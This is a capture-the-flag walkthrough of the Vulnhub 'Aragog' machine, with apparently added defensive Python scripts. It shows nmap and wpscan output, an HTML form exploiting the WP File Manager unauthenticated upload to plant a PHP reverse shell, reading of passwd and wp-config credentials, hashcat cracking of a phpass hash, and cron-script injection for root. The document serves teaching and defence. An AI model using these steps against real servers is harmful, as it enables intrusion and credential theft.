Let’s do another cool Vulnhub machine from @Mansoor R.
Aragog is the first VM of the three-box HarryPotter series.
Goal: find the 2 horcruxes hidden inside the machine.
Lab Setup:
Download the machine from the link and import it into VirtualBox.
Let’s start with reconnaissance.
Here is the machine's welcome message and its IP.
In my case the IP is 192.168.1.101.
Let’s start with a quick scan.
┌──(root💀kali)-[~/vm/arogya]
└─# nmap 192.168.1.101
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-06 10:16 IST
Nmap scan report for 192.168.1.101
Host is up (0.00061s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:57:94:99 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds
The quick scan shows two open ports: 22 (SSH) and 80 (HTTP).
Here is the complete Nmap scan report:
┌──(root💀kali)-[~/vm/arogya]
└─# nmap -sV -sC -A -vv -p- -oA 192.168.1.101 192.168.1.101
# Nmap 7.91 scan initiated Wed May 5 14:50:04 2021 as: nmap -sV -sC -A -vv -p- -oA 192.168.1.101 192.168.1.101
Nmap scan report for 192.168.1.101
Host is up, received arp-response (0.00073s latency).
Scanned at 2021-05-05 14:50:05 IST for 10s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDSJJ1ZAbIA3lP2RbpxnhknzLJqrHne4be3xTLmVEXWg7YQ6FFZ/RA1VzmrFYPlvB1t1XwopptI+nA9BSG5+hllLyCQ1pDZkhIwyGHuBLZETD8cIJTlsxVCwnh67h7eeK4hTEtjp1rUodK30juDf5u7JnkwVfo78LvM8WV1LjVrmhsZiqzy1CxAoMFpiRp3ZlvpblL3gdd0wgSNrGqEwc6qJc6Z+RKGkLbnpgTnOsc6vGLs1xFOGrHF2qFeDpUWti0ZDSN31LtP1HtNItbBKSECcFD3KrN8nPaZCa2V9GA1jrpOOAF1j0ehcRlBoFqLZzQbO9RFeIkgqGNrz3PDt7vp
| 256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBESZsj5u/F88CLIXTeBD8OgiCM2u8sKBgbvvjKccwFmCBMh3GmOHGP8qzzQwVTMkq1aN0WSIk7h8/cHCT2tZLzE=
| 256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMsH4OtBIy/He42Rc6KvtI6w2855JMLVloVFy5/0Rtj4
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:57:94:99 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=5/5%OT=22%CT=1%CU=37181%PV=Y%DS=1%DC=D%G=Y%M=080027%TM
OS:=6092634F%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S
On port 80 there is only a Harry Potter image.
So I ran gobuster for directory scanning and found one directory, /blog.
WordPress is running under /blog.
So I moved on to scanning WordPress with wpscan.
┌──(root💀kali)-[~/vm/arogya]
└─# wpscan --url http://192.168.1.101/blog/ --enumerate ap --plugins-detection aggressive --plugins-version-detection aggressive
wpscan found only 2 plugins, one of which is a default, so I looked into the other one.
And I found this:
The plugin is vulnerable: File Manager 6.0-6.9, Unauthenticated Arbitrary File Upload leading to RCE.
https://www.exploit-db.com/exploits/49178
https://wpscan.com/vulnerability/10389
So I created a simple HTML page and uploaded the payload through that form.
<html>
<body>
<form method="POST" enctype="multipart/form-data"
      action="http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php">
  <input type="hidden" name="cmd" value="upload"/>
  <input type="hidden" name="target" value="l1_Lw"/>
  <input type="file" name="upload[]"/><br/><br/>
  <input type="submit" value="Upload"/>
</form>
</body>
</html>
Uploaded file: /blog/wp-content/plugins/wp-file-manager/lib/php/../files/php-reverse-shell.php
Calling it from the browser gives a reverse shell.
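From the defender's side, the sequence just described (a direct POST to connector.minimal.php followed by a request for a PHP file under the plugin's lib/files/ directory) is easy to pick out of the Apache access log. The script below is an added example, not code from the original write-up or from the plugin; it assumes Apache's default "combined" LogFormat and the plugin's standard paths, and the log lines in SAMPLE_LOG are constructed (RFC 5737 test addresses, no real traffic).

```python
"""Flag wp-file-manager connector abuse in Apache "combined" access logs.

Added example, not part of the original write-up. Assumes the default
combined LogFormat and the plugin's standard paths; SAMPLE_LOG is constructed.
"""
import posixpath
import re
from collections import Counter
from dataclasses import dataclass

PLUGIN_BASE = "/wp-content/plugins/wp-file-manager/"
# elFinder connector that the affected versions exposed without WordPress authentication.
CONNECTOR = PLUGIN_BASE + "lib/php/connector.minimal.php"
# Where the connector writes uploads; nothing under it should ever run as PHP.
UPLOAD_DIR = PLUGIN_BASE + "lib/files/"
PHP_EXT_RE = re.compile(r"\.(?:php\d?|phtml|phar)$", re.IGNORECASE)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


@dataclass
class Finding:
    ip: str
    ts: str
    rule: str
    path: str      # normalised request path
    status: int


def normalize_path(raw: str) -> str:
    """Drop the query string and collapse '..', so the traversal form
    'lib/php/../files/x.php' that the request line records matches 'lib/files/x.php'."""
    return posixpath.normpath(raw.split("?", 1)[0])


def classify(method: str, raw_path: str):
    """Return a rule name for a suspicious request, or None for benign traffic."""
    path = normalize_path(raw_path)
    if CONNECTOR in path:
        # A direct request bypasses WordPress's own authentication; a POST may be an upload.
        return "connector-upload" if method == "POST" else "connector-probe"
    if UPLOAD_DIR in path and PHP_EXT_RE.search(path):
        return "uploaded-php-executed"
    return None


def scan_access_log(lines):
    """Parse combined-format lines and return the suspicious ones as Findings."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        rule = classify(m["method"], m["path"])
        if rule:
            findings.append(Finding(m["ip"], m["ts"], rule,
                                    normalize_path(m["path"]), int(m["status"])))
    return findings


def suspicious_ips(findings):
    """Count findings per client so an upload-then-execute pair stands out."""
    return dict(Counter(f.ip for f in findings))


# Constructed sample lines, not real traffic from the lab.
SAMPLE_LOG = [
    '203.0.113.7 - - [06/May/2021:10:30:01 +0530] "GET /blog/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [06/May/2021:10:30:05 +0530] "POST /blog/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [06/May/2021:10:30:09 +0530] "GET /blog/wp-content/plugins/wp-file-manager/lib/php/../files/php-reverse-shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [06/May/2021:10:31:00 +0530] "GET /blog/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php?_=1620280260 HTTP/1.1" 200 88 "-" "curl/7.74.0"',
    '198.51.100.4 - - [06/May/2021:10:31:30 +0530] "GET /blog/wp-content/uploads/2021/05/cat.jpg HTTP/1.1" 200 4096 "-" "curl/7.74.0"',
]

if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG)
    for f in found:
        print(f"{f.ts} {f.ip} {f.rule} {f.path} {f.status}")
    print(suspicious_ips(found))
```

Against a live server, pass the file object straight in (`scan_access_log(open("/var/log/apache2/access.log"))`). The path normalisation is the part that matters: Apache logs the request line as received, so the traversal variant `lib/php/../files/` is what actually appears, and a naive substring match on `lib/files/` would miss it. The fix on the server side is updating the plugin past the affected range and denying PHP execution under any directory the web application writes to.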
The next step is to check the users.
I found 2 user entries in /etc/passwd:
gi**y:x:1001:1001::/home/XXXX:/bin/sh
ha****98:x:1000:1000:XXXX,,,:/home/XXXX:/bin/bash
Because WordPress is running, I moved on to find the database credentials.
After some enumeration I found the WordPress configuration file with the credentials:
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'my******ss');
define('DB_HOST', 'localhost');
define('DB_COLLATE', 'utf8_general_ci');
define('WP_CONTENT_DIR', '/xxxxx/xxxxx/xxxx/xxxx');
?>
In the database I found one hash:
hagrid98:$P$BY**************JDHtc.
So I used hashcat (-m 400, phpass) to crack the hash:
┌──(root💀kali)-[~/vm/arogya]
└─# hashcat -O -a 0 -m 400 hash /usr/share/wordlists/rockyou.txt -o result.txt
That gave me the password of ha****98.
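The `$P$B` prefix on the hagrid98 hash identifies a phpass "portable" hash, the scheme hashcat mode 400 targets. To show what that format encodes and why a wordlist run against it finishes quickly, here is an added pure-Python re-implementation of the verification routine; it is not code from the write-up, from WordPress or from phpass itself, the salt and password in the demo are constructed, and the real hash from the machine is not used.

```python
"""Verify a WordPress/phpass portable hash ($P$...) in pure Python.

Added example, not from the original write-up. Re-implements phpass's
crypt_private()/encode64() so the hash layout can be read off:
  $P$ + cost char + 8-char salt + 22-char custom-base64 MD5 digest  (34 chars)
The demo salt and password are constructed.
"""
import hashlib
import hmac

# phpass's own base64 alphabet (not RFC 4648).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes, count: int) -> str:
    """phpass encode64(): 3 input bytes -> 4 alphabet chars, little-endian."""
    out = []
    i = 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def iteration_count(setting: str) -> int:
    """MD5 rounds encoded by the 4th character: 'B' is index 13 -> 2**13 = 8192."""
    if setting[:3] not in ("$P$", "$H$"):   # $H$ is the same scheme as used by phpBB
        raise ValueError("not a phpass portable hash")
    log2 = ITOA64.index(setting[3])
    if not 7 <= log2 <= 30:
        raise ValueError("cost outside phpass's accepted range")
    return 1 << log2


def _crypt_private(password: bytes, setting: str) -> str:
    rounds = iteration_count(setting)
    salt = setting[4:12].encode()
    digest = hashlib.md5(salt + password).digest()
    for _ in range(rounds):  # phpass: do { hash = md5(hash . password) } while (--count)
        digest = hashlib.md5(digest + password).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_hash(password: str, salt: str, log2_rounds: int = 13) -> str:
    """Produce a $P$ hash. log2_rounds=13 gives the 'B' cost seen in WordPress hashes."""
    if len(salt) != 8 or any(c not in ITOA64 for c in salt):
        raise ValueError("salt must be 8 chars from the phpass alphabet")
    return _crypt_private(password.encode(), "$P$" + ITOA64[log2_rounds] + salt)


def verify_phpass(password: str, stored: str) -> bool:
    """Recompute with the stored cost and salt, then compare in constant time."""
    if len(stored) != 34:
        return False
    try:
        computed = _crypt_private(password.encode(), stored)
    except (ValueError, IndexError):
        return False
    return hmac.compare_digest(computed, stored)


if __name__ == "__main__":
    h = phpass_hash("constructed-demo-pw", "abcdefgh")  # constructed, not the machine's hash
    print(h, iteration_count(h), verify_phpass("constructed-demo-pw", h))
```

`iteration_count` makes the weakness concrete: the 'B' cost character means 8192 rounds of MD5 per guess, which a GPU gets through in microseconds, so a password from a common wordlist falls in seconds. The defensive answer is long, unique passwords for WordPress accounts and, where the installation allows it, a bcrypt or Argon2 based hasher instead of phpass.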
Got the first flag, which is base64-encoded:
horcrux_{RiXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXets}
Privilege escalation is a little bit tricky.
Manual searching turned up nothing, so I moved on to monitoring the running cron jobs.
I used pspy to watch the processes cron spawns.
After watching for a while, one of the commands looked interesting, so I paid attention to it.
So I added a reverse shell command to the file it runs and started a listener on my side.
Once the file is executed, we get the shell.
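The escalation works because a privileged cron job executes a file that a lower-privileged user can modify. The audit below is an added example, not code from the write-up or from pspy: it parses the system-crontab format (/etc/crontab and /etc/cron.d, five time fields, a user field, then the command), picks out the script each job runs, and reports when that file is missing, a symlink, not owned by the expected user, or writable by group or others. The crontab text and the files that `demo()` checks are constructed in a temporary directory, with the current user standing in for root as the trusted owner.

```python
"""Audit system-crontab entries for scripts a non-root user could modify.

Added example, not part of the original write-up. Parses the /etc/crontab
and /etc/cron.d format (with user field). demo() builds constructed fixtures.
"""
import os
import re
import shlex
import stat
import tempfile
from dataclasses import dataclass, field

# "@hourly user cmd" or "m h dom mon dow user cmd"
CRON_LINE_RE = re.compile(r"^(?:@\w+\s+|(?:\S+\s+){5})(?P<user>\S+)\s+(?P<command>.+)$")
SYSTEM_BIN_DIRS = {"/bin", "/sbin", "/usr/bin", "/usr/sbin"}


@dataclass
class CronFinding:
    user: str
    command: str
    script: str
    problems: list = field(default_factory=list)


def parse_system_crontab(text):
    """Yield (user, command) for each job; skip blanks, comments and VAR=value lines."""
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#") or re.match(r"^\w+=", s):
            continue
        m = CRON_LINE_RE.match(s)
        if m:
            yield m["user"], m["command"]


def first_path(command):
    """Best-effort guess of the script a job runs: the first absolute path outside the
    system bin directories, so '/bin/bash /opt/job.sh' yields '/opt/job.sh'. Tokens after
    a redirection or shell operator are ignored."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        return None
    paths = []
    for t in tokens:
        if any(c in t for c in "<>|;&"):
            break
        if t.startswith("/"):
            paths.append(t)
    preferred = [p for p in paths if os.path.dirname(p) not in SYSTEM_BIN_DIRS]
    chosen = preferred or paths
    return chosen[0] if chosen else None


def check_script(path, trusted_uid=0):
    """Return a list of problems; an empty list means the file looks safe to run from cron."""
    problems = []
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return ["script missing: whoever can create it controls the job"]
    if stat.S_ISLNK(st.st_mode):
        problems.append("script is a symlink")
        try:
            st = os.stat(path)
        except FileNotFoundError:
            return problems + ["symlink target missing"]
    if st.st_uid != trusted_uid:
        problems.append(f"owned by uid {st.st_uid}, not {trusted_uid}")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        problems.append(f"file is group/world-writable (mode {stat.S_IMODE(st.st_mode):o})")
    parent = os.stat(os.path.dirname(path) or "/")
    if (parent.st_mode & stat.S_IWOTH) and not (parent.st_mode & stat.S_ISVTX):
        problems.append("parent directory is world-writable without the sticky bit")
    return problems


def audit_crontab(text, trusted_uid=0):
    """Check every job in a system-crontab text and return one CronFinding per job."""
    findings = []
    for user, command in parse_system_crontab(text):
        script = first_path(command)
        problems = check_script(script, trusted_uid) if script else ["could not identify script path"]
        findings.append(CronFinding(user, command, script or "", problems))
    return findings


def demo():
    """Constructed fixture: a hardened job, a world-writable job and a missing script.
    The current user stands in for root as trusted owner (the demo cannot chown to root)."""
    tmp = tempfile.mkdtemp(prefix="cron-audit-demo-")
    safe = os.path.join(tmp, "backup.sh")
    weak = os.path.join(tmp, "cleanup.sh")
    for p in (safe, weak):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\necho job\n")
    os.chmod(safe, 0o755)
    os.chmod(weak, 0o777)  # the mistake: anyone can edit what a privileged job will execute
    crontab = f"""
# constructed /etc/crontab for the demo
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/5 * * * *  root  /bin/bash {safe}
* * * * *    root  {weak}
@hourly      root  /usr/bin/python3 {tmp}/missing.py > /dev/null 2>&1
"""
    return audit_crontab(crontab, trusted_uid=os.getuid())


if __name__ == "__main__":
    for f in demo():
        print(f"{f.user:6} {f.script}: {'; '.join(f.problems) or 'ok'}")
```

On a real host, feed it `open("/etc/crontab").read()` plus each file in /etc/cron.d with `trusted_uid=0`; per-user crontabs under /var/spool/cron have no user field and need the five-field form instead. Any job whose script comes back with a non-empty problem list is the kind of thing pspy would have shown executing, and fixing it is a chown to root and a chmod that removes group and world write.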
Now I got the second flag, also base64-encoded:
horcrux_{maXXXXXXXXXXXXXXXXXXXXXXXXXXXXXOre}
Hurray!!!
Everything else is straightforward, but the privilege escalation part is a little challenging.
All you need to do is keep focusing on the running services and monitor each of them.